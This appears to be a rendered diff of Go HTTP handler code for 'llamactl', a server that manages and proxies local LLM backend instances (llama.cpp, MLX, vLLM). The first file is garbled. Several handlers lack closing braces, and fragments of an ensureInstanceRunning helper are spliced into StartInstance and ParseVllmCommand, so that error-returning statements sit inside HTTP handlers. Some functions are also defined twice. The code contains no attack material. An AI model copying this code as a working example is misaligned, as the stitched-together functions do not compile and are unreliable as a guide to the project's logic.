// writeError writes a JSON error response with the specified HTTP status code
func writeError(w http.ResponseWriter, status int, code, details string) {
w.Header().Set("Content-Type", "application/json")
w.WriteHeader(status)
if err := json.NewEncoder(w).Encode(errorResponse{Error: code, Details: details}); err != nil {
log.Printf("Failed to encode error response: %v", err)
}
}
// writeJSON writes a JSON response with the specified HTTP status code
func writeJSON(w http.ResponseWriter, status int, data any) {
w.Header().Set("Content-Type", "application/json")
w.WriteHeader(status)
if err := json.NewEncoder(w).Encode(data); err != nil {
log.Printf("Failed to encode JSON response: %v", err)
}
}
// writeText writes a plain text response with the specified HTTP status code
func writeText(w http.ResponseWriter, status int, data string) {
w.Header().Set("Content-Type", "text/plain")
w.WriteHeader(status)
if _, err := w.Write([]byte(data)); err != nil {
log.Printf("Failed to write text response: %v", err)
}
}
// Handler provides HTTP handlers for the llamactl server API
type Handler struct {
InstanceManager manager.InstanceManager
cfg config.AppConfig
httpClient *http.Client
}
// NewHandler creates a new Handler instance with the provided instance manager and configuration
func NewHandler(im manager.InstanceManager, cfg config.AppConfig) *Handler {
return &Handler{
InstanceManager: im,
cfg: cfg,
httpClient: &http.Client{
Timeout: 30 * time.Second,
},
}
}
// VersionHandler godoc
// @Summary Get llamactl version
// @Description Returns the version of the llamactl command
// @Tags version
// @Security ApiKeyAuth
// @Produces text/plain
// @Success 200 {string} string "Version information"
// @Failure 500 {string} string "Internal Server Error"
// @Router /version [get]
func (h *Handler) VersionHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Content-Type", "text/plain")
fmt.Fprintf(w, "Version: %s\nCommit: %s\nBuild Time: %s\n", h.cfg.Version, h.cfg.CommitHash, h.cfg.BuildTime)
// getInstance retrieves an instance by name from the request query parameters
func (h *Handler) getInstance(r *http.Request) (*instance.Instance, error) {
name := chi.URLParam(r, "name")
validatedName, err := validation.ValidateInstanceName(name)
if err != nil {
return nil, fmt.Errorf("invalid instance name: %w", err)
}
inst, err := h.InstanceManager.GetInstance(validatedName)
if err != nil {
return nil, fmt.Errorf("failed to get instance by name: %w", err)
}
return inst, nil
}
// LlamaServerHelpHandler godoc
// @Summary Get help for llama server
// @Description Returns the help text for the llama server command
// @Tags backends
// @Security ApiKeyAuth
// @Produces text/plain
// @Success 200 {string} string "Help text"
// @Failure 500 {string} string "Internal Server Error"
// @Router /backends/llama-cpp/help [get]
func (h *Handler) LlamaServerHelpHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
helpCmd := exec.Command("llama-server", "--help")
output, err := helpCmd.CombinedOutput()
if err != nil {
http.Error(w, "Failed to get help: "+err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "text/plain")
w.Write(output)
// ensureInstanceRunning ensures the instance is running by starting it if on-demand start is enabled
// It handles LRU eviction when the maximum number of running instances is reached
func (h *Handler) ensureInstanceRunning(inst *instance.Instance) error {
options := inst.GetOptions()
allowOnDemand := options != nil && options.OnDemandStart != nil && *options.OnDemandStart
if !allowOnDemand {
return fmt.Errorf("instance is not running and on-demand start is not enabled")
}
}
// LlamaServerVersionHandler godoc
// @Summary Get version of llama server
// @Description Returns the version of the llama server command
// @Tags backends
// @Security ApiKeyAuth
// @Produces text/plain
// @Success 200 {string} string "Version information"
// @Failure 500 {string} string "Internal Server Error"
// @Router /backends/llama-cpp/version [get]
func (h *Handler) LlamaServerVersionHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
versionCmd := exec.Command("llama-server", "--version")
output, err := versionCmd.CombinedOutput()
if err != nil {
http.Error(w, "Failed to get version: "+err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "text/plain")
w.Write(output)
}
}
// LlamaServerListDevicesHandler godoc
// @Summary List available devices for llama server
// @Description Returns a list of available devices for the llama server
// @Tags backends
// @Security ApiKeyAuth
// @Produces text/plain
// @Success 200 {string} string "List of devices"
// @Failure 500 {string} string "Internal Server Error"
// @Router /backends/llama-cpp/devices [get]
func (h *Handler) LlamaServerListDevicesHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
listCmd := exec.Command("llama-server", "--list-devices")
output, err := listCmd.CombinedOutput()
if err != nil {
http.Error(w, "Failed to list devices: "+err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "text/plain")
w.Write(output)
}
}
// ListInstances godoc
// @Summary List all instances
// @Description Returns a list of all instances managed by the server
// @Tags instances
// @Security ApiKeyAuth
// @Produces json
// @Success 200 {array} instance.Process "List of instances"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances [get]
func (h *Handler) ListInstances() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
instances, err := h.InstanceManager.ListInstances()
if err != nil {
http.Error(w, "Failed to list instances: "+err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(instances); err != nil {
http.Error(w, "Failed to encode instances: "+err.Error(), http.StatusInternalServerError)
return
}
}
}
// CreateInstance godoc
// @Summary Create and start a new instance
// @Description Creates a new instance with the provided configuration options
// @Tags instances
// @Security ApiKeyAuth
// @Accept json
// @Produces json
// @Param name path string true "Instance Name"
// @Param options body instance.CreateInstanceOptions true "Instance configuration options"
// @Success 201 {object} instance.Process "Created instance details"
// @Failure 400 {string} string "Invalid request body"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name} [post]
func (h *Handler) CreateInstance() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
name := chi.URLParam(r, "name")
if name == "" {
http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
return
}
var options instance.CreateInstanceOptions
if err := json.NewDecoder(r.Body).Decode(&options); err != nil {
http.Error(w, "Invalid request body", http.StatusBadRequest)
return
}
inst, err := h.InstanceManager.CreateInstance(name, &options)
if err != nil {
http.Error(w, "Failed to create instance: "+err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/json")
w.WriteHeader(http.StatusCreated)
if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return
}
}
}
// GetInstance godoc
// @Summary Get details of a specific instance
// @Description Returns the details of a specific instance by name
// @Tags instances
// @Security ApiKeyAuth
// @Produces json
// @Param name path string true "Instance Name"
// @Success 200 {object} instance.Process "Instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name} [get]
func (h *Handler) GetInstance() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
name := chi.URLParam(r, "name")
if name == "" {
http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
return
}
inst, err := h.InstanceManager.GetInstance(name)
if err != nil {
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return
}
}
}
// UpdateInstance godoc
// @Summary Update an instance's configuration
// @Description Updates the configuration of a specific instance by name
// @Tags instances
// @Security ApiKeyAuth
// @Accept json
// @Produces json
// @Param name path string true "Instance Name"
// @Param options body instance.CreateInstanceOptions true "Instance configuration options"
// @Success 200 {object} instance.Process "Updated instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name} [put]
func (h *Handler) UpdateInstance() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
name := chi.URLParam(r, "name")
if name == "" {
http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
return
}
var options instance.CreateInstanceOptions
if err := json.NewDecoder(r.Body).Decode(&options); err != nil {
http.Error(w, "Invalid request body", http.StatusBadRequest)
return
}
inst, err := h.InstanceManager.UpdateInstance(name, &options)
if err != nil {
http.Error(w, "Failed to update instance: "+err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return
}
}
}
// StartInstance godoc
// @Summary Start a stopped instance
// @Description Starts a specific instance by name
// @Tags instances
// @Security ApiKeyAuth
// @Produces json
// @Param name path string true "Instance Name"
// @Success 200 {object} instance.Process "Started instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name}/start [post]
func (h *Handler) StartInstance() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
name := chi.URLParam(r, "name")
if name == "" {
http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
return
}
inst, err := h.InstanceManager.StartInstance(name)
if err != nil {
// Check if error is due to maximum running instances limit
if _, ok := err.(manager.MaxRunningInstancesError); ok {
http.Error(w, err.Error(), http.StatusConflict)
return
if h.InstanceManager.IsMaxRunningInstancesReached() {
if h.cfg.Instances.EnableLRUEviction {
err := h.InstanceManager.EvictLRUInstance()
if err != nil {
return fmt.Errorf("cannot start instance, failed to evict instance: %w", err)
}
http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return
}
}
}
// StopInstance godoc
// @Summary Stop a running instance
// @Description Stops a specific instance by name
// @Tags instances
// @Security ApiKeyAuth
// @Produces json
// @Param name path string true "Instance Name"
// @Success 200 {object} instance.Process "Stopped instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name}/stop [post]
func (h *Handler) StopInstance() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
name := chi.URLParam(r, "name")
if name == "" {
http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
return
}
inst, err := h.InstanceManager.StopInstance(name)
if err != nil {
http.Error(w, "Failed to stop instance: "+err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return
}
}
}
// RestartInstance godoc
// @Summary Restart a running instance
// @Description Restarts a specific instance by name
// @Tags instances
// @Security ApiKeyAuth
// @Produces json
// @Param name path string true "Instance Name"
// @Success 200 {object} instance.Process "Restarted instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name}/restart [post]
func (h *Handler) RestartInstance() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
name := chi.URLParam(r, "name")
if name == "" {
http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
return
}
inst, err := h.InstanceManager.RestartInstance(name)
if err != nil {
http.Error(w, "Failed to restart instance: "+err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return
}
}
}
// DeleteInstance godoc
// @Summary Delete an instance
// @Description Stops and removes a specific instance by name
// @Tags instances
// @Security ApiKeyAuth
// @Param name path string true "Instance Name"
// @Success 204 "No Content"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name} [delete]
func (h *Handler) DeleteInstance() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
name := chi.URLParam(r, "name")
if name == "" {
http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
return
}
if err := h.InstanceManager.DeleteInstance(name); err != nil {
http.Error(w, "Failed to delete instance: "+err.Error(), http.StatusInternalServerError)
return
}
w.WriteHeader(http.StatusNoContent)
}
}
// GetInstanceLogs godoc
// @Summary Get logs from a specific instance
// @Description Returns the logs from a specific instance by name with optional line limit
// @Tags instances
// @Security ApiKeyAuth
// @Param name path string true "Instance Name"
// @Param lines query string false "Number of lines to retrieve (default: all lines)"
// @Produces text/plain
// @Success 200 {string} string "Instance logs"
// @Failure 400 {string} string "Invalid name format or lines parameter"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name}/logs [get]
func (h *Handler) GetInstanceLogs() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
name := chi.URLParam(r, "name")
if name == "" {
http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
return
}
lines := r.URL.Query().Get("lines")
if lines == "" {
lines = "-1"
}
num_lines, err := strconv.Atoi(lines)
if err != nil {
http.Error(w, "Invalid lines parameter: "+err.Error(), http.StatusBadRequest)
return
}
inst, err := h.InstanceManager.GetInstance(name)
if err != nil {
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
return
}
logs, err := inst.GetLogs(num_lines)
if err != nil {
http.Error(w, "Failed to get logs: "+err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "text/plain")
w.Write([]byte(logs))
}
}
// ProxyToInstance godoc
// @Summary Proxy requests to a specific instance
// @Description Forwards HTTP requests to the llama-server instance running on a specific port
// @Tags instances
// @Security ApiKeyAuth
// @Param name path string true "Instance Name"
// @Success 200 "Request successfully proxied to instance"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Failure 503 {string} string "Instance is not running"
// @Router /instances/{name}/proxy [get]
// @Router /instances/{name}/proxy [post]
func (h *Handler) ProxyToInstance() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
name := chi.URLParam(r, "name")
if name == "" {
http.Error(w, "Instance name cannot be empty", http.StatusBadRequest)
return
}
inst, err := h.InstanceManager.GetInstance(name)
if err != nil {
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
return
}
if !inst.IsRunning() {
http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
return
}
// Get the cached proxy for this instance
proxy, err := inst.GetProxy()
if err != nil {
http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError)
return
}
// Strip the "/api/v1/instances/<name>/proxy" prefix from the request URL
prefix := fmt.Sprintf("/api/v1/instances/%s/proxy", name)
proxyPath := r.URL.Path[len(prefix):]
// Ensure the proxy path starts with "/"
if !strings.HasPrefix(proxyPath, "/") {
proxyPath = "/" + proxyPath
}
// Update the last request time for the instance
inst.UpdateLastRequestTime()
// Modify the request to remove the proxy prefix
originalPath := r.URL.Path
r.URL.Path = proxyPath
// Set forwarded headers
r.Header.Set("X-Forwarded-Host", r.Header.Get("Host"))
r.Header.Set("X-Forwarded-Proto", "http")
// Restore original path for logging purposes
defer func() {
r.URL.Path = originalPath
}()
// Forward the request using the cached proxy
proxy.ServeHTTP(w, r)
}
}
// OpenAIListInstances godoc
// @Summary List instances in OpenAI-compatible format
// @Description Returns a list of instances in a format compatible with OpenAI API
// @Tags openai
// @Security ApiKeyAuth
// @Produces json
// @Success 200 {object} OpenAIListInstancesResponse "List of OpenAI-compatible instances"
// @Failure 500 {string} string "Internal Server Error"
// @Router /v1/models [get]
func (h *Handler) OpenAIListInstances() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
instances, err := h.InstanceManager.ListInstances()
if err != nil {
http.Error(w, "Failed to list instances: "+err.Error(), http.StatusInternalServerError)
return
}
openaiInstances := make([]OpenAIInstance, len(instances))
for i, inst := range instances {
openaiInstances[i] = OpenAIInstance{
ID: inst.Name,
Object: "model",
Created: inst.Created,
OwnedBy: "llamactl",
}
}
openaiResponse := OpenAIListInstancesResponse{
Object: "list",
Data: openaiInstances,
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(openaiResponse); err != nil {
http.Error(w, "Failed to encode instances: "+err.Error(), http.StatusInternalServerError)
return
}
}
}
// OpenAIProxy godoc
// @Summary OpenAI-compatible proxy endpoint
// @Description Handles all POST requests to /v1/*, routing to the appropriate instance based on the request body. Requires API key authentication via the `Authorization` header.
// @Tags openai
// @Security ApiKeyAuth
// @Accept json
// @Produces json
// @Success 200 "OpenAI response"
// @Failure 400 {string} string "Invalid request body or instance name"
// @Failure 500 {string} string "Internal Server Error"
// @Router /v1/ [post]
func (h *Handler) OpenAIProxy() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
// Read the entire body first
bodyBytes, err := io.ReadAll(r.Body)
if err != nil {
http.Error(w, "Failed to read request body", http.StatusBadRequest)
return
}
r.Body.Close()
// Parse the body to extract instance name
var requestBody map[string]any
if err := json.Unmarshal(bodyBytes, &requestBody); err != nil {
http.Error(w, "Invalid request body", http.StatusBadRequest)
return
}
modelName, ok := requestBody["model"].(string)
if !ok || modelName == "" {
http.Error(w, "Instance name is required", http.StatusBadRequest)
return
}
// Route to the appropriate inst based on instance name
inst, err := h.InstanceManager.GetInstance(modelName)
if err != nil {
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
return
}
if !inst.IsRunning() {
allowOnDemand := inst.GetOptions() != nil && inst.GetOptions().OnDemandStart != nil && *inst.GetOptions().OnDemandStart
if !allowOnDemand {
http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
return
}
if h.InstanceManager.IsMaxRunningInstancesReached() {
if h.cfg.Instances.EnableLRUEviction {
err := h.InstanceManager.EvictLRUInstance()
if err != nil {
http.Error(w, "Cannot start Instance, failed to evict instance "+err.Error(), http.StatusInternalServerError)
return
}
} else {
http.Error(w, "Cannot start Instance, maximum number of instances reached", http.StatusConflict)
return
}
}
// If on-demand start is enabled, start the instance
if _, err := h.InstanceManager.StartInstance(modelName); err != nil {
http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
return
}
// Wait for the instance to become healthy before proceeding
if err := inst.WaitForHealthy(h.cfg.Instances.OnDemandStartTimeout); err != nil { // 2 minutes timeout
http.Error(w, "Instance failed to become healthy: "+err.Error(), http.StatusServiceUnavailable)
return
}
}
proxy, err := inst.GetProxy()
if err != nil {
http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError)
return
}
// Update last request time for the instance
inst.UpdateLastRequestTime()
// Recreate the request body from the bytes we read
r.Body = io.NopCloser(bytes.NewReader(bodyBytes))
r.ContentLength = int64(len(bodyBytes))
proxy.ServeHTTP(w, r)
}
}
// ParseCommandRequest represents the request body for command parsing
type ParseCommandRequest struct {
Command string `json:"command"`
}
// ParseLlamaCommand godoc
// @Summary Parse llama-server command
// @Description Parses a llama-server command string into instance options
// @Tags backends
// @Security ApiKeyAuth
// @Accept json
// @Produce json
// @Param request body ParseCommandRequest true "Command to parse"
// @Success 200 {object} instance.CreateInstanceOptions "Parsed options"
// @Failure 400 {object} map[string]string "Invalid request or command"
// @Failure 500 {object} map[string]string "Internal Server Error"
// @Router /backends/llama-cpp/parse-command [post]
func (h *Handler) ParseLlamaCommand() http.HandlerFunc {
type errorResponse struct {
Error string `json:"error"`
Details string `json:"details,omitempty"`
}
writeError := func(w http.ResponseWriter, status int, code, details string) {
w.Header().Set("Content-Type", "application/json")
w.WriteHeader(status)
_ = json.NewEncoder(w).Encode(errorResponse{Error: code, Details: details})
}
return func(w http.ResponseWriter, r *http.Request) {
var req ParseCommandRequest
if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
writeError(w, http.StatusBadRequest, "invalid_request", "Invalid JSON body")
return
}
if strings.TrimSpace(req.Command) == "" {
writeError(w, http.StatusBadRequest, "invalid_command", "Command cannot be empty")
return
}
llamaOptions, err := llamacpp.ParseLlamaCommand(req.Command)
if err != nil {
writeError(w, http.StatusBadRequest, "parse_error", err.Error())
return
}
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: llamaOptions,
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(options); err != nil {
writeError(w, http.StatusInternalServerError, "encode_error", err.Error())
}
}
}
// ParseMlxCommand godoc
// @Summary Parse mlx_lm.server command
// @Description Parses MLX-LM server command string into instance options
// @Tags backends
// @Security ApiKeyAuth
// @Accept json
// @Produce json
// @Param request body ParseCommandRequest true "Command to parse"
// @Success 200 {object} instance.CreateInstanceOptions "Parsed options"
// @Failure 400 {object} map[string]string "Invalid request or command"
// @Router /backends/mlx/parse-command [post]
func (h *Handler) ParseMlxCommand() http.HandlerFunc {
type errorResponse struct {
Error string `json:"error"`
Details string `json:"details,omitempty"`
}
writeError := func(w http.ResponseWriter, status int, code, details string) {
w.Header().Set("Content-Type", "application/json")
w.WriteHeader(status)
_ = json.NewEncoder(w).Encode(errorResponse{Error: code, Details: details})
}
return func(w http.ResponseWriter, r *http.Request) {
var req ParseCommandRequest
if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
writeError(w, http.StatusBadRequest, "invalid_request", "Invalid JSON body")
return
}
if strings.TrimSpace(req.Command) == "" {
writeError(w, http.StatusBadRequest, "invalid_command", "Command cannot be empty")
return
}
mlxOptions, err := mlx.ParseMlxCommand(req.Command)
if err != nil {
writeError(w, http.StatusBadRequest, "parse_error", err.Error())
return
}
// Currently only support mlx_lm backend type
backendType := backends.BackendTypeMlxLm
options := &instance.CreateInstanceOptions{
BackendType: backendType,
MlxServerOptions: mlxOptions,
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(options); err != nil {
writeError(w, http.StatusInternalServerError, "encode_error", err.Error())
}
}
}
// ParseVllmCommand godoc
// @Summary Parse vllm serve command
// @Description Parses a vLLM serve command string into instance options
// @Tags backends
// @Security ApiKeyAuth
// @Accept json
// @Produce json
// @Param request body ParseCommandRequest true "Command to parse"
// @Success 200 {object} instance.CreateInstanceOptions "Parsed options"
// @Failure 400 {object} map[string]string "Invalid request or command"
// @Router /backends/vllm/parse-command [post]
func (h *Handler) ParseVllmCommand() http.HandlerFunc {
type errorResponse struct {
Error string `json:"error"`
Details string `json:"details,omitempty"`
}
writeError := func(w http.ResponseWriter, status int, code, details string) {
w.Header().Set("Content-Type", "application/json")
w.WriteHeader(status)
_ = json.NewEncoder(w).Encode(errorResponse{Error: code, Details: details})
}
return func(w http.ResponseWriter, r *http.Request) {
var req ParseCommandRequest
if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
writeError(w, http.StatusBadRequest, "invalid_request", "Invalid JSON body")
return
}
if strings.TrimSpace(req.Command) == "" {
writeError(w, http.StatusBadRequest, "invalid_command", "Command cannot be empty")
return
}
vllmOptions, err := vllm.ParseVllmCommand(req.Command)
if err != nil {
writeError(w, http.StatusBadRequest, "parse_error", err.Error())
return
}
backendType := backends.BackendTypeVllm
options := &instance.CreateInstanceOptions{
BackendType: backendType,
VllmServerOptions: vllmOptions,
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(options); err != nil {
writeError(w, http.StatusInternalServerError, "encode_error", err.Error())
} else {
return fmt.Errorf("cannot start instance, maximum number of instances reached")
}
}
// If on-demand start is enabled, start the instance
if _, err := h.InstanceManager.StartInstance(inst.Name); err != nil {
return fmt.Errorf("failed to start instance: %w", err)
}
// Wait for the instance to become healthy before proceeding
if err := inst.WaitForHealthy(h.cfg.Instances.OnDemandStartTimeout); err != nil {
return fmt.Errorf("instance failed to become healthy: %w", err)
}
return nil
}

View File

@@ -0,0 +1,302 @@
package server
import (
"encoding/json"
"fmt"
"llamactl/pkg/backends"
"llamactl/pkg/instance"
"net/http"
"os/exec"
"strings"
)
// ParseCommandRequest represents the request body for backend command parsing
type ParseCommandRequest struct {
Command string `json:"command"`
}
// validateLlamaCppInstance validates that the instance specified in the request is a llama.cpp instance
func (h *Handler) validateLlamaCppInstance(r *http.Request) (*instance.Instance, error) {
inst, err := h.getInstance(r)
if err != nil {
return nil, fmt.Errorf("invalid instance: %w", err)
}
options := inst.GetOptions()
if options == nil {
return nil, fmt.Errorf("cannot obtain instance's options")
}
if options.BackendOptions.BackendType != backends.BackendTypeLlamaCpp {
return nil, fmt.Errorf("instance is not a llama.cpp server")
}
return inst, nil
}
// stripLlamaCppPrefix removes the llama.cpp proxy prefix from the request URL path
func (h *Handler) stripLlamaCppPrefix(r *http.Request, instName string) {
// Strip the "/llama-cpp/<name>" prefix from the request URL
prefix := fmt.Sprintf("/llama-cpp/%s", instName)
r.URL.Path = strings.TrimPrefix(r.URL.Path, prefix)
}
// LlamaCppUIProxy godoc
// @Summary Proxy requests to llama.cpp UI for the instance
// @Description Proxies requests to the llama.cpp UI for the specified instance
// @Tags Llama.cpp
// @Security ApiKeyAuth
// @Produce html
// @Param name query string true "Instance Name"
// @Success 200 {string} string "Proxied HTML response"
// @Failure 400 {string} string "Invalid instance"
// @Failure 500 {string} string "Internal Server Error"
// @Router /llama-cpp/{name}/ [get]
func (h *Handler) LlamaCppUIProxy() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
inst, err := h.validateLlamaCppInstance(r)
if err != nil {
writeError(w, http.StatusBadRequest, "invalid instance", err.Error())
return
}
if !inst.IsRemote() && !inst.IsRunning() {
writeError(w, http.StatusBadRequest, "instance is not running", "Instance is not running")
return
}
if !inst.IsRemote() {
h.stripLlamaCppPrefix(r, inst.Name)
}
// Use instance's ServeHTTP which tracks inflight requests and handles shutting down state
err = inst.ServeHTTP(w, r)
if err != nil {
// Error is already handled in ServeHTTP (response written)
return
}
}
}
// LlamaCppProxy godoc
// @Summary Proxy requests to llama.cpp server instance
// @Description Proxies requests to the specified llama.cpp server instance, starting it on-demand if configured
// @Tags Llama.cpp
// @Security ApiKeyAuth
// @Produce json
// @Param name path string true "Instance Name"
// @Success 200 {object} map[string]any "Proxied response"
// @Failure 400 {string} string "Invalid instance"
// @Failure 500 {string} string "Internal Server Error"
// @Router /llama-cpp/{name}/props [get]
// @Router /llama-cpp/{name}/slots [get]
// @Router /llama-cpp/{name}/apply-template [post]
// @Router /llama-cpp/{name}/completion [post]
// @Router /llama-cpp/{name}/detokenize [post]
// @Router /llama-cpp/{name}/embeddings [post]
// @Router /llama-cpp/{name}/infill [post]
// @Router /llama-cpp/{name}/metrics [post]
// @Router /llama-cpp/{name}/props [post]
// @Router /llama-cpp/{name}/reranking [post]
// @Router /llama-cpp/{name}/tokenize [post]
func (h *Handler) LlamaCppProxy() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
inst, err := h.validateLlamaCppInstance(r)
if err != nil {
writeError(w, http.StatusBadRequest, "invalid instance", err.Error())
return
}
// Check if instance is shutting down before autostart logic
if inst.GetStatus() == instance.ShuttingDown {
writeError(w, http.StatusServiceUnavailable, "instance_shutting_down", "Instance is shutting down")
return
}
if !inst.IsRemote() && !inst.IsRunning() {
err := h.ensureInstanceRunning(inst)
if err != nil {
writeError(w, http.StatusInternalServerError, "instance start failed", err.Error())
return
}
}
if !inst.IsRemote() {
h.stripLlamaCppPrefix(r, inst.Name)
}
// Use instance's ServeHTTP which tracks inflight requests and handles shutting down state
err = inst.ServeHTTP(w, r)
if err != nil {
// Error is already handled in ServeHTTP (response written)
return
}
}
}
// parseHelper parses a backend command and returns the parsed options
func parseHelper(w http.ResponseWriter, r *http.Request, backend interface {
ParseCommand(string) (any, error)
}) (any, bool) {
var req ParseCommandRequest
if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
writeError(w, http.StatusBadRequest, "invalid_request", "Invalid JSON body")
return nil, false
}
if strings.TrimSpace(req.Command) == "" {
writeError(w, http.StatusBadRequest, "invalid_command", "Command cannot be empty")
return nil, false
}
// Parse command using the backend's ParseCommand method
parsedOptions, err := backend.ParseCommand(req.Command)
if err != nil {
writeError(w, http.StatusBadRequest, "parse_error", err.Error())
return nil, false
}
return parsedOptions, true
}
// ParseLlamaCommand godoc
// @Summary Parse llama-server command
// @Description Parses a llama-server command string into instance options
// @Tags Backends
// @Security ApiKeyAuth
// @Accept json
// @Produce json
// @Param request body ParseCommandRequest true "Command to parse"
// @Success 200 {object} instance.Options "Parsed options"
// @Failure 400 {object} map[string]string "Invalid request or command"
// @Failure 500 {object} map[string]string "Internal Server Error"
// @Router /api/v1/backends/llama-cpp/parse-command [post]
func (h *Handler) ParseLlamaCommand() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
parsedOptions, ok := parseHelper(w, r, &backends.LlamaServerOptions{})
if !ok {
return
}
options := &instance.Options{
BackendOptions: backends.Options{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: parsedOptions.(*backends.LlamaServerOptions),
},
}
writeJSON(w, http.StatusOK, options)
}
}
// ParseMlxCommand godoc
// @Summary Parse mlx_lm.server command
// @Description Parses MLX-LM server command string into instance options
// @Tags Backends
// @Security ApiKeyAuth
// @Accept json
// @Produce json
// @Param request body ParseCommandRequest true "Command to parse"
// @Success 200 {object} instance.Options "Parsed options"
// @Failure 400 {object} map[string]string "Invalid request or command"
// @Router /api/v1/backends/mlx/parse-command [post]
func (h *Handler) ParseMlxCommand() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
parsedOptions, ok := parseHelper(w, r, &backends.MlxServerOptions{})
if !ok {
return
}
options := &instance.Options{
BackendOptions: backends.Options{
BackendType: backends.BackendTypeMlxLm,
MlxServerOptions: parsedOptions.(*backends.MlxServerOptions),
},
}
writeJSON(w, http.StatusOK, options)
}
}
// ParseVllmCommand godoc
// @Summary Parse vllm serve command
// @Description Parses a vLLM serve command string into instance options
// @Tags Backends
// @Security ApiKeyAuth
// @Accept json
// @Produce json
// @Param request body ParseCommandRequest true "Command to parse"
// @Success 200 {object} instance.Options "Parsed options"
// @Failure 400 {object} map[string]string "Invalid request or command"
// @Router /api/v1/backends/vllm/parse-command [post]
func (h *Handler) ParseVllmCommand() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
